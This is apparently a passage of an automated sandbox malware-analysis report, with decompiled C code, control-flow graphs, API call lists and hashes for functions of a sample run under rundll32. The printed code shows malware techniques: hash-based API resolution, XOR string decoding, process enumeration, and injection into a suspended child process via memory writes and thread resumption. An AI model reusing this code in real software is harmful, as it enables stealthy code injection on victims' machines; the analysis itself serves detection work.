            0x0346c832
            0x0346c839
            0x0346c83c
            0x0346c859

            APIs
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0346C7BF
            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0346C7F1
              • Part of subcall function 03469FE4: _vsnwprintf.MSVCRT ref: 0346A001
            • lstrcatW.KERNEL32(?,00000114), ref: 0346C82A
            • CharUpperBuffW.USER32(?,00000000), ref: 0346C83C
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
            • String ID:
            • API String ID: 455400327-0
            • Opcode ID: 93d871fc1d7c8ba01761e603043523783ca02980b70bd3befbc0e0c5bbd06105
            • Instruction ID: 3a75348aa0cd55916620abb04c8ac97963571a08de00e92cb14f752826ec824d
            • Opcode Fuzzy Hash: 93d871fc1d7c8ba01761e603043523783ca02980b70bd3befbc0e0c5bbd06105
            • Instruction Fuzzy Hash: B42174B6A00314BFD704EBA5DC49FAE77BCEF84200F10416AF505EA181EA749E048B65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346EF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 179 346ef38-346ef4f 180 346ef51-346ef79 179->180 181 346efac 179->181 180->181 183 346ef7b-346ef9e call 346a5d0 call 346e34a 180->183 182 346efae-346efb2 181->182 188 346efb3-346efca 183->188 189 346efa0-346efaa 183->189 190 346f020-346f022 188->190 191 346efcc-346efd4 188->191 189->181 189->183 190->182 191->190 192 346efd6 191->192 193 346efd8-346efde 192->193 194 346efe0-346efe2 193->194 195 346efee-346efff 193->195 194->195 196 346efe4-346efec 194->196 197 346f004-346f010 LoadLibraryA 195->197 198 346f001-346f002 195->198 196->193 196->195 197->181 199 346f012-346f01c GetProcAddress 197->199 198->197 199->181 200 346f01e 199->200 200->182
            C-Code - Quality: 100%
            			E0346EF38(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0346E34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0346A5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























            0x0346ef41
            0x0346ef43
            0x0346ef46
            0x0346ef49
            0x0346ef4f
            0x0346efac
            0x00000000
            0x0346efac
            0x0346ef51
            0x0346ef5c
            0x0346ef5f
            0x0346ef64
            0x0346ef69
            0x0346ef6c
            0x0346ef6e
            0x0346ef71
            0x0346ef74
            0x0346ef79
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0346ef7b
            0x0346ef7b
            0x0346ef8d
            0x0346ef9a
            0x0346ef9e
            0x00000000
            0x00000000
            0x0346efa0
            0x0346efa3
            0x0346efa4
            0x0346efaa
            0x00000000
            0x00000000
            0x00000000
            0x0346efaa
            0x0346efc1
            0x0346efc6
            0x0346efca
            0x00000000
            0x0346efd6
            0x0346efd6
            0x0346efd8
            0x0346efd8
            0x0346efde
            0x00000000
            0x00000000
            0x0346efe4
            0x0346efe8
            0x0346efec
            0x00000000
            0x00000000
            0x00000000
            0x0346efec
            0x0346eff2
            0x0346effa
            0x0346efff
            0x0346f002
            0x0346f002
            0x0346f004
            0x0346f008
            0x0346f010
            0x00000000
            0x00000000
            0x0346f014
            0x0346f01c
            0x00000000
            0x00000000
            0x00000000
            0x0346f01c

            APIs
            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0346F008
            • GetProcAddress.KERNEL32(00000000,?), ref: 0346F014
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: .dll
            • API String ID: 2574300362-2738580789
            • Opcode ID: 74c446ed9f3e6f2089ebbdced29686edc74dbf2dbd7b87db25ed223b10f2d916
            • Instruction ID: eb9833fccf88630ac0dd4590b4076b7c35fbcaef520eabf389f2fe750bb11903
            • Opcode Fuzzy Hash: 74c446ed9f3e6f2089ebbdced29686edc74dbf2dbd7b87db25ed223b10f2d916
            • Instruction Fuzzy Hash: 6231E635A00255ABCB18CFADD980BAEFBF9AF44244F28046AD845EF341D730D981C799
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03468BCD Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94stringCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 201 3468bcd-3468be2 202 3468be4-3468be7 201->202 203 3468c05 201->203 204 3468bee-3468bfe 202->204 205 3468c0a-3468c2a 203->205 206 3468c00-3468c03 204->206 207 3468c5d-3468c5f 204->207 208 3468c2c-3468c31 205->208 209 3468c3a-3468c3e 205->209 206->203 206->204 207->203 213 3468c61-3468c65 call 3468dc9 207->213 208->208 210 3468c33-3468c38 208->210 211 3468c40-3468c4a 209->211 212 3468c4c-3468c56 lstrlenW 209->212 210->209 210->211 211->211 211->212 214 3468c58-3468c5c 212->214 216 3468c6a-3468c72 213->216 217 3468c74-3468c79 216->217 218 3468c7b-3468c80 216->218 217->214 219 3468c82-3468c99 218->219 219->219 220 3468c9b-3468c9e 219->220 220->205
            C-Code - Quality: 80%
            			E03468BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				short _v44;
				void* _t38;
				intOrPtr _t47;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t59;
				void* _t62;
				void* _t64;
				signed int _t71;
				signed int _t74;
				void* _t76;
				void* _t77;

				_t71 = _a12;
				_t53 = __edx;
				_v8 = __ecx;
				_t74 = _t71;
				if(_t71 >= __edx) {
					L4:
					_t54 = 0x347f94e;
					L5:
					_t58 = 0;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					asm("movsb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_t38 = 0;
					if(_v28 == 0) {
						L8:
						_t64 = _t38;
						if(_t64 == 0) {
							L10:
							lstrlenW( &_v44);
							return _t54;
						} else {
							goto L9;
						}
						do {
							L9:
							_t19 = _t58 + 0x30; // 0x30
							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
							_t58 = _t58 + 1;
						} while (_t58 < _t64);
						goto L10;
					} else {
						goto L6;
					}
					do {
						L6:
						_t38 = _t38 + 1;
					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
					_t64 = 0xe;
					if(_t38 > _t64) {
						goto L9;
					}
					goto L8;
				}
				_t59 = _a4;
				_a12 = 0x5a;
				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
					_t74 = _t74 + 1;
					if(_t74 < _t53) {
						continue;
					}
					goto L4;
				}
				_t76 = _t74 - _t71;
				if(_t76 == 0) {
					goto L4;
				}
				_t47 = E03468DC9(_t76 + 1); // executed
				_t55 = _t47;
				_v12 = _t55;
				if(_t55 != 0) {
					_t56 = _a4;
					_t62 = _t55 - _t71;
					do {
						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
						_t71 = _t71 + 1;
						_t76 = _t76 - 1;
					} while (_t76 != 0);
					_t54 = _v12;
					goto L5;
				}
				return 0x347f94e;
			}





















            0x03468bd6
            0x03468bd9
            0x03468bdb
            0x03468bde
            0x03468be2
            0x03468c05
            0x03468c05
            0x03468c0a
            0x03468c14
            0x03468c16
            0x03468c17
            0x03468c18
            0x03468c19
            0x03468c1b
            0x03468c1f
            0x03468c20
            0x03468c21
            0x03468c22
            0x03468c24
            0x03468c25
            0x03468c2a
            0x03468c3a
            0x03468c3a
            0x03468c3e
            0x03468c4c
            0x03468c50
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x03468c40
            0x03468c40
            0x03468c40
            0x03468c43
            0x03468c47
            0x03468c48
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x03468c2c
            0x03468c2c
            0x03468c2c
            0x03468c2d
            0x03468c35
            0x03468c38
            0x00000000
            0x00000000
            0x00000000
            0x03468c38
            0x03468be4
            0x03468be7
            0x03468bee
            0x03468c00
            0x03468c03
            0x00000000
            0x00000000
            0x00000000
            0x03468c03
            0x03468c5d
            0x03468c5f
            0x00000000
            0x00000000
            0x03468c65
            0x03468c6a
            0x03468c6c
            0x03468c72
            0x03468c7d
            0x03468c80
            0x03468c82
            0x03468c92
            0x03468c95
            0x03468c96
            0x03468c96
            0x03468c9b
            0x00000000
            0x03468c9b
            0x00000000

            APIs
            • lstrlenW.KERNEL32(?,00000138,?,0347CA88), ref: 03468C50
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: lstrlen
            • String ID: GetCurrentPath$Z
            • API String ID: 1659193697-4005238709
            • Opcode ID: 93c422dda84a582d8f45ef44815606182d3416c842ec7a8f8bc16fe723fef564
            • Instruction ID: 8a650cf056dc69fa112cf4527946fd1183a71e86c5b934a8c199e7276b606660
            • Opcode Fuzzy Hash: 93c422dda84a582d8f45ef44815606182d3416c842ec7a8f8bc16fe723fef564
            • Instruction Fuzzy Hash: FE212371B017896FCB14CFADC8804AFBBA6BF9D210B28047AD941AF305D6319D468799
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346BAF6 Relevance: 4.6, APIs: 3, Instructions: 66processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 221 346baf6-346bb1e CreateToolhelp32Snapshot 222 346bb20-346bb49 call 3468f63 Process32First 221->222 223 346bb8e-346bb94 221->223 226 346bb4b-346bb57 222->226 227 346bb59-346bb69 call 346daf2 222->227 226->223 230 346bb7e-346bb8b FindCloseChangeNotification 227->230 231 346bb6b-346bb7c 227->231 230->223 231->227 231->230
            C-Code - Quality: 72%
            			E0346BAF6(void* __ecx, void* __edx) {
				void* _v304;
				char _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t38;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E03468F63( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						while(1) {
							_t43 = _v312( &_v308, _t33);
							if(_t43 == 0) {
								break;
							}
							_t38 =  *0x347f8d0; // 0x50ff8c0
							_push( &_v308);
							_push(_t45);
							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
								continue;
							}
							break;
						}
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x347f8d0; // 0x50ff8c0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}













            0x0346bb0e
            0x0346bb10
            0x0346bb14
            0x0346bb17
            0x0346bb19
            0x0346bb1e
            0x0346bb2d
            0x0346bb35
            0x0346bb49
            0x0346bb59
            0x0346bb63
            0x0346bb69
            0x00000000
            0x00000000
            0x0346bb6b
            0x0346bb75
            0x0346bb76
            0x0346bb7c
            0x00000000
            0x00000000
            0x00000000
            0x0346bb7c
            0x0346bb84
            0x0346bb8b
            0x0346bb4b
            0x0346bb4b
            0x0346bb51
            0x0346bb56
            0x0346bb56
            0x0346bb49
            0x0346bb94

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0346BB14
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
            • Process32First.KERNEL32(00000000,?), ref: 0346BB44
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0346BB84
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
            • String ID:
            • API String ID: 3344077921-0
            • Opcode ID: db78fabe6a2d27744d592df5948552ace1f9261dcbcdd091390b2719c2ba34cf
            • Instruction ID: b0c5c9e6798486d6f1e2f0a80aedcedc468fa8351b2a80302670a020a1126e55
            • Opcode Fuzzy Hash: db78fabe6a2d27744d592df5948552ace1f9261dcbcdd091390b2719c2ba34cf
            • Instruction Fuzzy Hash: 461186722042419FC310EF69EC49E6B77ECFF89660F19066EF564DB288EB20D9048766
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346C986 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 234 346c986-346c9a6 GetTokenInformation 235 346c9ec 234->235 236 346c9a8-346c9b1 GetLastError 234->236 237 346c9ee-346c9f2 235->237 236->235 238 346c9b3-346c9c3 call 3468dc9 236->238 241 346c9c5-346c9c7 238->241 242 346c9c9-346c9dc GetTokenInformation 238->242 241->237 242->235 243 346c9de-346c9ea call 3468ddf 242->243 243->241
            C-Code - Quality: 86%
            			E0346C986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E03468DC9(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E03468DDF( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










            0x0346c989
            0x0346c98a
            0x0346c991
            0x0346c999
            0x0346c99d
            0x0346c9a6
            0x0346c9ec
            0x0346c9ec
            0x0346c9b3
            0x0346c9bb
            0x0346c9bd
            0x0346c9c3
            0x0346c9dc
            0x00000000
            0x0346c9de
            0x0346c9e3
            0x00000000
            0x0346c9e9
            0x0346c9c5
            0x0346c9c5
            0x0346c9c5
            0x0346c9c5
            0x0346c9c3
            0x0346c9f2

            APIs
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,03460000,00000000,00000000,?,0346CA07,00000000,00000000,?,0346CA30), ref: 0346C9A1
            • GetLastError.KERNEL32(?,0346CA07,00000000,00000000,?,0346CA30,00001644,?,0346E053), ref: 0346C9A8
              • Part of subcall function 03468DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03469793,00000100,?,0346661B), ref: 03468DD7
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0346CA07,00000000,00000000,?,0346CA30,00001644,?,0346E053), ref: 0346C9D7
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: InformationToken$AllocateErrorHeapLast
            • String ID:
            • API String ID: 2499131667-0
            • Opcode ID: 071714050bfe48f8f9ea358667b3aa2433bf32ad4fd1f0261b58554d256768fe
            • Instruction ID: 6c0a9c6ced5d948ea63d178e211fe78082f5efeb18387d5fac7d8ba12e4bdcfb
            • Opcode Fuzzy Hash: 071714050bfe48f8f9ea358667b3aa2433bf32ad4fd1f0261b58554d256768fe
            • Instruction Fuzzy Hash: D901A2B6600214FF8B20EFA6DC89D9B7FECEF496A07110466F445EA201E730DD048BB5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346BE10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 246 346be10-346be5f call 3468f63 * 2 CreateProcessW
            C-Code - Quality: 79%
            			E0346BE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E03468F63(__edx, 0, 0x10);
				E03468F63( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





            0x0346be21
            0x0346be2e
            0x0346be36
            0x0346be52
            0x0346be58
            0x0346be5f

            APIs
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0346BE52
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CreateProcessmemset
            • String ID: D
            • API String ID: 2296119082-2746444292
            • Opcode ID: 32e5d098f3cc605913e15fa3736932d8c965f88bfc2a8ff09b4091f26ae4d7e5
            • Instruction ID: 9263db6bf822fc2f0a455de95e37c07aaa254c181bf3e1cee68dc649d6111e14
            • Opcode Fuzzy Hash: 32e5d098f3cc605913e15fa3736932d8c965f88bfc2a8ff09b4091f26ae4d7e5
            • Instruction Fuzzy Hash: B9F065F16402087EF720EA65CC0AFBF37ACDB85710F500125BB05EF1C0E6A0AD0582B5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346D889 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 251 346d889-346d8a9 call 346d7cd 254 346d8af-346d8ce call 346b6e3 251->254 255 346d9da-346d9dd 251->255 258 346d8d4-346d8d6 254->258 259 346d9ca-346d9d9 call 3468ddf 254->259 260 346d8dc-346d8de 258->260 261 346d9b8-346d9c8 call 3468ddf 258->261 259->255 263 346d8e1-346d8e3 260->263 261->259 266 346d9a6-346d9b2 263->266 267 346d8e9-346d908 call 3468f63 call 346be10 263->267 266->258 266->261 273 346d96a-346d96e 267->273 274 346d90a-346d91d call 346d9de 267->274 275 346d970-346d972 273->275 276 346d999-346d9a0 273->276 274->273 281 346d91f-346d937 274->281 278 346d974-346d97a 275->278 279 346d983-346d993 275->279 276->263 276->266 278->279 279->276 284 346d967 281->284 285 346d939-346d94e GetLastError call 346dadc 281->285 284->273 288 346d963-346d964 FindCloseChangeNotification 285->288 289 346d950-346d95b 285->289 288->284 291 346d95e 289->291 292 346d95d 289->292 291->288 292->291
            C-Code - Quality: 96%
            			E0346D889(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E0346D7CD( &_v16, __edx);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x347f8d4; // 0x50ffc00
				_t7 = _t38 + 0xac; // 0xa4858137
				E0346B6E3( &_v80,  *_t7 + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E03468DDF( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E03468F63( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E0346BE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E0346D9DE(E03466297,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x347f8d0; // 0x50ff8c0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E0346DADC( &_v40);
									_t63 =  *0x347f8d0; // 0x50ff8c0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x347f8d0; // 0x50ff8c0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x347f8d0; // 0x50ff8c0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x347f8d0; // 0x50ff8c0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x347f8d0; // 0x50ff8c0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E03468DDF(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























            0x0346d88f
            0x0346d898
            0x0346d89b
            0x0346d89d
            0x0346d8a2
            0x0346d8a4
            0x0346d8a7
            0x0346d8a9
            0x0346d9dd
            0x0346d9dd
            0x0346d8af
            0x0346d8b8
            0x0346d8c1
            0x0346d8c6
            0x0346d8c9
            0x0346d8ce
            0x0346d9ca
            0x0346d9d0
            0x00000000
            0x0346d9d9
            0x0346d8d4
            0x0346d8dc
            0x0346d8de
            0x0346d8e1
            0x0346d8f0
            0x0346d8fb
            0x0346d901
            0x0346d906
            0x0346d908
            0x0346d915
            0x0346d91d
            0x0346d928
            0x0346d933
            0x0346d937
            0x0346d939
            0x0346d942
            0x0346d949
            0x0346d94e
            0x0346d950
            0x0346d955
            0x0346d95b
            0x0346d95d
            0x0346d95d
            0x0346d95e
            0x0346d95e
            0x0346d964
            0x0346d964
            0x0346d967
            0x0346d967
            0x0346d91d
            0x0346d96e
            0x0346d972
            0x0346d974
            0x0346d97d
            0x0346d97d
            0x0346d983
            0x0346d98b
            0x0346d98e
            0x0346d996
            0x0346d996
            0x0346d999
            0x0346d99a
            0x0346d9a0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0346d9a0
            0x0346d9a9
            0x0346d9ac
            0x0346d9ad
            0x0346d9b2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0346d9b8
            0x00000000
            0x00000000
            0x00000000
            0x0346d9b8
            0x0346d9b8
            0x0346d9bb
            0x0346d9c1
            0x0346d9c5

            APIs
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
              • Part of subcall function 0346BE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0346BE52
              • Part of subcall function 0346D9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0346DA40
              • Part of subcall function 0346D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0346DA89
              • Part of subcall function 0346D9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0346DAA6
              • Part of subcall function 0346D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0346DAC7
            • GetLastError.KERNEL32(?,?,00000001), ref: 0346D939
              • Part of subcall function 0346DADC: ResumeThread.KERNELBASE(?,0346D947,?,?,00000001), ref: 0346DAE4
            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0346D964
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
            • String ID:
            • API String ID: 2212882986-0
            • Opcode ID: da7846e33d93cad28a9e797a020a9d9dd29b4684d20449383cd97c90ee8d0aca
            • Instruction ID: 056eb6c6314393e7d33561cad1405cbaf44eb7a9640154dec1b0b29f85e5fc7f
            • Opcode Fuzzy Hash: da7846e33d93cad28a9e797a020a9d9dd29b4684d20449383cd97c90ee8d0aca
            • Instruction Fuzzy Hash: AE418076F00209AFCB10EFA9C984E9EB7F9FF49210F15406AE915FF254D73099088B65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03466603 Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 61%
            			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x347f8d0; // 0x50ff8c0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E03468DB4();
				E03469787();
				 *0x347f8e8 = _a4;
				E03473D36(_a4);
				 *_t49 = 0xf2e;
				 *0x347f8d0 = E0346F0D9(0x347ca88, 0x138);
				 *_t49 = 0xe8d;
				_t23 = E03469F85(0x347ca88);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E03468D9A();
					 *_t49 = 0x1f4;
